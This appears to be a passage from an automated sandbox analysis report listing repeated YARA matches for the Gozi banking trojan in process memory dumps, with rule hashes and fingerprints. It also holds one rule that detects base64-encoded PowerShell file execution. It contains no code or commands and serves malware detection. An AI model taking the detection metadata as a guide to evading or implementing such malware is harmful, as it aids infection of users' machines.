Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
